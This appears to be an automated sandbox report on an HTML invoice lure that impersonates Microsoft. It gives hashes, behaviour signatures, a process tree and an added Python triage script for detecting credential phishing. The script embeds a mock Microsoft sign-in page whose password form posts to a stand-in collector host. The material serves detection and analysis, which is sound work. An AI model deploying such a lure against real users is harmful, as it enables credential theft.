Analysis

  • max time kernel
    37s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26-03-2023 08:21

General

  • Target

    Tallon SOP Invoice (Single).html

  • Size

    345KB

  • MD5

    6d039563bc00dd48c90ab1c3fb22670a

  • SHA1

    b3cdde7b163549addaf54b160fcec303ae59136d

  • SHA256

    41032026e75479d5defd71c7dd2c3fcaa1c72a8b44cb8a387339f8455c910221

  • SHA512

    1e21e4faf91636dbe18d13526070aab80811b3afc7e569949bdd3d6e9d454287613292380ec16d6d3a89de37e87b53a41273d89235566f9d76d940d8402fd755

  • SSDEEP

    6144:D+cONCmQ+ZoWY9CLgO/ye730cxHzfjpmUqvMmy:D+cONCmQ+ZRLx/yEH3EHvMJ

Score
5/10

Malware Config

Signatures

  • Detected potential entity reuse from brand Microsoft (the HTML presents itself as a Microsoft page, a common credential-phishing lure indicator)
  • Modifies Internet Explorer settings (1 TTP, 32 IoCs)
  • Suspicious use of FindShellTrayWindow (1 IoC)
  • Suspicious use of SetWindowsHookEx (6 IoCs)
  • Suspicious use of WriteProcessMemory (3 IoCs)
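The report's top signature says only that the HTML reuses the Microsoft brand; it does not show what an analyst would check next. The script below is an added example (not the sandbox's own signature logic and not the sample's content) of static first-pass triage for an HTML lure: it recomputes the digest set the report lists so a local copy can be matched, then parses the markup for brand strings, password fields and form targets that post outside the impersonated brand's domains. The sample HTML, the brand term list and the brand domain allow-list are constructed assumptions for illustration.

```python
import hashlib
import re
from html.parser import HTMLParser

# Digests the report gives for the real sample; used only for comparison.
REPORTED_HASHES = {
    "md5": "6d039563bc00dd48c90ab1c3fb22670a",
    "sha1": "b3cdde7b163549addaf54b160fcec303ae59136d",
    "sha256": "41032026e75479d5defd71c7dd2c3fcaa1c72a8b44cb8a387339f8455c910221",
}

# Constructed stand-in for a brand-impersonating lure (assumption: the real
# sample is not reproduced on the page, so this is illustrative only).
SAMPLE_HTML = b"""<html><head><title>Microsoft Office 365 - Sign in</title></head>
<body>
<img src="https://logincdn.msauth.net/16.000/images/microsoft_logo.svg">
<form method="post" action="https://collector.example.invalid/post.php">
  <input type="email" name="login">
  <input type="password" name="passwd">
  <input type="submit" value="Sign in">
</form>
</body></html>"""

# Domains a genuine Microsoft sign-in page would post to or load from
# (assumption: a short illustrative allow-list, not an authoritative one).
BRAND_DOMAINS = {
    "microsoft": ("microsoft.com", "microsoftonline.com", "live.com",
                  "office.com", "msauth.net"),
}
# Strings whose presence suggests the page is styled as that brand (assumption).
BRAND_TERMS = {
    "microsoft": ("microsoft", "office 365", "outlook", "onedrive", "sharepoint"),
}


def hash_sample(data: bytes) -> dict:
    """Return the same digest set the report lists, so a local copy can be matched."""
    return {n: hashlib.new(n, data).hexdigest() for n in ("md5", "sha1", "sha256", "sha512")}


def matches_report(data: bytes, reported: dict = REPORTED_HASHES) -> bool:
    """True only if every digest in `reported` matches the supplied bytes."""
    got = hash_sample(data)
    return all(got[name] == value for name, value in reported.items())


def _host_of(url: str):
    """Host part of an absolute http(s) URL, or None for relative/other schemes."""
    m = re.match(r"^\s*https?://([^/?#:]+)", url, re.IGNORECASE)
    return m.group(1).lower() if m else None


def _under(host: str, domains) -> bool:
    return any(host == d or host.endswith("." + d) for d in domains)


class _LureScanner(HTMLParser):
    """Collect form targets, password fields and every referenced host."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_inputs = 0
        self.hosts = set()

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        for key in ("src", "href", "action"):
            host = _host_of(a.get(key, ""))
            if host:
                self.hosts.add(host)


def triage_html(data: bytes) -> dict:
    """Brand reuse plus credential form posting off-brand is the classic harvesting pattern."""
    text = data.decode("utf-8", errors="replace")
    lower = text.lower()
    scanner = _LureScanner()
    scanner.feed(text)
    brands = sorted(b for b, terms in BRAND_TERMS.items() if any(t in lower for t in terms))
    # Flag absolute form targets whose host is outside every detected brand's domains.
    suspicious = []
    for action in scanner.form_actions:
        host = _host_of(action)
        if host and not any(_under(host, BRAND_DOMAINS[b]) for b in brands):
            suspicious.append(action)
    return {
        "brands": brands,
        "password_inputs": scanner.password_inputs,
        "form_actions": scanner.form_actions,
        "suspicious_form_actions": suspicious,
        "hosts": sorted(scanner.hosts),
        "likely_credential_phish": bool(brands) and scanner.password_inputs > 0 and bool(suspicious),
    }


if __name__ == "__main__":
    print("matches report:", matches_report(SAMPLE_HTML))
    for key, value in triage_html(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

Relative or script-driven form actions are deliberately not flagged here; a lure that submits credentials via JavaScript or a fetch() call needs the script body inspected, which static attribute scanning does not cover.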

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe (PID 4216)
    "C:\Program Files\Internet Explorer\iexplore.exe" "C:\Users\Admin\AppData\Local\Temp\Tallon SOP Invoice (Single).html"
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 4192, child of 4216)
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4216 CREDAT:17410 /prefetch:2
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion: Modify Registry (T1112), 1 technique

Downloads

Both entries below are Windows CryptoAPI network cache files (CryptnetUrlCache) written while the browser retrieved certificate chain or revocation data; they are a side effect of IE's TLS handling, not content authored by the sample.

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize

    471B

    MD5

    81e074fc1cade892fd87593f0a9fa5d7

    SHA1

    0be86dbe06e55e575909ba567d4d55de3999603f

    SHA256

    ac22d20053b4bfe019939e425b716c857b87c424925289ff9cb3cb646192f8e3

    SHA512

    db2bc9c95711e8b62666b5194d58bafce974c01d0345270ca2a832a17ac4b756338349dd8ef2b6e0d14773afc3de4ccea036fc247cf1d5042785655012667e91

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize

    434B

    MD5

    1b3c51399e5d158a87d4f025e398d2bb

    SHA1

    8ffcef442bf9dfb314fff03c056855283bc94af6

    SHA256

    4bbc8552fdac46157f78e67fe36af5dd441d50436e8a274c246cf1c669a454f3

    SHA512

    b628fd316e31bd8b97e03bfc6e4c7cb5f976fb4db99047990c31d98bbcb5ccd3a44ac4f82f184e1a3dbb2f1a8db99d83dd81109fb9f071e58d9b7ead7d150efd